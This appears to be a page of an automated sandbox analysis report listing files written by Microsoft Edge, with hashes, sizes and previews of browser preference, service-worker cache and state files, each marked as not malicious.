SHA1:	CF33B7C4A2774AA76AFD2F7E0412F7E12F1DB91E
SHA-256:	B67599489551F03260920711B52AFF9A5EC2974150794ADA1E35F78DC31C1187
SHA-512:	3B16CCCD902C69F883F90C982884073C5C705544781C9CAB72D73321AD5662138C2902FF156CF1C80E3044E2707EFDF071811F4833CFD0A83F48340A03D7F709
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375211578536407","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF53e39.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	5.115172260313591
Encrypted:	false
SSDEEP:	192:stLkdpjsUnsZihUkeCe8CbV+Fg8QA66W6aFIMYAP3YJ:stLQjsUnfhCbGvQx6W6aTYJ
MD5:	584838E88AFF9E1494F77112F38AAFD3
SHA1:	CF33B7C4A2774AA76AFD2F7E0412F7E12F1DB91E
SHA-256:	B67599489551F03260920711B52AFF9A5EC2974150794ADA1E35F78DC31C1187
SHA-512:	3B16CCCD902C69F883F90C982884073C5C705544781C9CAB72D73321AD5662138C2902FF156CF1C80E3044E2707EFDF071811F4833CFD0A83F48340A03D7F709
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375211578536407","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24853
Entropy (8bit):	5.56489048984974
Encrypted:	false
SSDEEP:	768:hItpJCWP9Vfdk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVbS+H+rwYpHtuj:hItpJCWP9Vfdku1jaKfHbct4
MD5:	FFD86E9038A7F2DF3075496480495F68
SHA1:	673C92ECF4633CF6550FD4C51379ED5FD53CE3D2
SHA-256:	1C395CC0A9211136B0BD2E1FC9A862EE0E79F468EDAF0B4A079D0C6070BADAFB
SHA-512:	D4B9901FEC08B564BCB0D7558C1C19380B0B67F851A75A4F46CA8BA5CBF423E4E3DB47A798328E603E9C8617D8028D77589E431AAA47FB3C37017C105D78321E
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375211577814654","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375211577814654","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF533d9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24853
Entropy (8bit):	5.56489048984974
Encrypted:	false
SSDEEP:	768:hItpJCWP9Vfdk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVbS+H+rwYpHtuj:hItpJCWP9Vfdku1jaKfHbct4
MD5:	FFD86E9038A7F2DF3075496480495F68
SHA1:	673C92ECF4633CF6550FD4C51379ED5FD53CE3D2
SHA-256:	1C395CC0A9211136B0BD2E1FC9A862EE0E79F468EDAF0B4A079D0C6070BADAFB
SHA-512:	D4B9901FEC08B564BCB0D7558C1C19380B0B67F851A75A4F46CA8BA5CBF423E4E3DB47A798328E603E9C8617D8028D77589E431AAA47FB3C37017C105D78321E
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375211577814654","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375211577814654","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113825
Entropy (8bit):	5.579024189612761
Encrypted:	false
SSDEEP:	1536:sa906yxPXfOrr1lhCe1+46rCjF3NlYN6H+Gy9lL/rDL/rH+:f9LyxPXfOrr1lMe1z6rWLenlL/HL/a
MD5:	E360E1E69C0F9A8E925B3CDAD070E166
SHA1:	339E69996949E7E1DD5C489D1A132EDA832AC0CD
SHA-256:	E94AE3DB0A3E9FC597C5ED02334A78B82476D9172E583B2E0E1FD4840A27EF5E
SHA-512:	96B337BD9D17566A964887A7182CE4B940303966DEEBC24A317539E8CFE3827E17136A9F96854D05DC7FC2909D58D210348AF5DD8B8E3671A6A5792836049EA0
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	187993
Entropy (8bit):	6.3798860344614265
Encrypted:	false
SSDEEP:	3072:XlQTg2fUaRwNborW2ZBP2GvRNy7pFdxYO2fL/qJNfoC4vU:+Rwn23/jyVGL/WJ4vU
MD5:	36F5355B9B1135979A881DB8DDCB0FB2
SHA1:	EDFDE48424893DD5CB4054184F83E186BBF179B4
SHA-256:	A25D034E999437642AB6E11AF95B9B631F60095F153B5078860511E9107E78CA
SHA-512:	53EAC2F5E29B462D7DA132C5DEDE44961F96E1FAB6D489D9A73C638CC1E7AA779D8FC9699301887DF7F173CDA5A16FF5110D17F26F14C1C4BB08AA6342FBE6B9
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;.....x..........,T.8..`,.....L`.....,T...`......L`......Rc.. !....exports...Rc..l.....module....Rcz.6.....define....Rbb.5....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.V...b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....A..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....4U...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.955557653394731
Encrypted:	false
SSDEEP:	3:DgclXTEdHhKln:8clXgdHhKln
MD5:	BA754D74C4F89E660A22DBE71BB5D337
SHA1:	A9F5C38FFCAE66435B4A62AF6E3E53FFDAF1C039
SHA-256:	91672BB8E56BE9892CC2870396FD7680A3BC7C0C78BC1F52149BEC5441E59651
SHA-512:	6D838DEAB4FB0801199B1387FD03589D3CA31E390FAB7F9839618F57C83F625FFD72752206F6F3EABC30A1C9A503B39812BA3E752B8F7EB6D8488B91EB012D82
Malicious:	false
Preview:	(.....2)oy retne.........................-..../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.955557653394731
Encrypted:	false
SSDEEP:	3:DgclXTEdHhKln:8clXgdHhKln
MD5:	BA754D74C4F89E660A22DBE71BB5D337
SHA1:	A9F5C38FFCAE66435B4A62AF6E3E53FFDAF1C039
SHA-256:	91672BB8E56BE9892CC2870396FD7680A3BC7C0C78BC1F52149BEC5441E59651
SHA-512:	6D838DEAB4FB0801199B1387FD03589D3CA31E390FAB7F9839618F57C83F625FFD72752206F6F3EABC30A1C9A503B39812BA3E752B8F7EB6D8488B91EB012D82
Malicious:	false
Preview:	(.....2)oy retne.........................-..../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\85cf43d4-8c75-4421-aa3d-16a916a77432.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ecc3b7e8-2828-4d24-ba50-d6a48c550709.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b03ab2af-45dd-46b4-aea3-3a623339e16d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b3c97508-82c8-4c72-ae29-bfcef1c7e1f4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24853
Entropy (8bit):	5.56489048984974
Encrypted:	false
SSDEEP:	768:hItpJCWP9Vfdk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVbS+H+rwYpHtuj:hItpJCWP9Vfdku1jaKfHbct4
MD5:	FFD86E9038A7F2DF3075496480495F68
SHA1:	673C92ECF4633CF6550FD4C51379ED5FD53CE3D2
SHA-256:	1C395CC0A9211136B0BD2E1FC9A862EE0E79F468EDAF0B4A079D0C6070BADAFB
SHA-512:	D4B9901FEC08B564BCB0D7558C1C19380B0B67F851A75A4F46CA8BA5CBF423E4E3DB47A798328E603E9C8617D8028D77589E431AAA47FB3C37017C105D78321E
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375211577814654","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375211577814654","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f1711b84-6c85-4a5f-bdd4-2a92a95e0be2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	5.115172260313591
Encrypted:	false
SSDEEP:	192:stLkdpjsUnsZihUkeCe8CbV+Fg8QA66W6aFIMYAP3YJ:stLQjsUnfhCbGvQx6W6aTYJ
MD5:	584838E88AFF9E1494F77112F38AAFD3
SHA1:	CF33B7C4A2774AA76AFD2F7E0412F7E12F1DB91E
SHA-256:	B67599489551F03260920711B52AFF9A5EC2974150794ADA1E35F78DC31C1187
SHA-512:	3B16CCCD902C69F883F90C982884073C5C705544781C9CAB72D73321AD5662138C2902FF156CF1C80E3044E2707EFDF071811F4833CFD0A83F48340A03D7F709
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375211578536407","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090760753546619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMQwuF9hDO6vP6O+8tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEO6Ntbz8hu3VlXr4CRo1
MD5:	FF06141689970FFC988042BABECD1FCE
SHA1:	34B311470B4D15C7964568552039E05761352069
SHA-256:	AC67C402643ACBAF82EC745D9AC82C0D19BC5E78E49230CF6FE02F57A248CD6A
SHA-512:	9B958C8C7B14044F77DF6A50E6A0E50E5355AB4B1964ED277D29D82694BC74B210A960F703A3010335B2E9692B8C2CF567184560DAC34DB4DAECFF6633FCC3DE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4e377.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090760753546619
Encrypted:	false
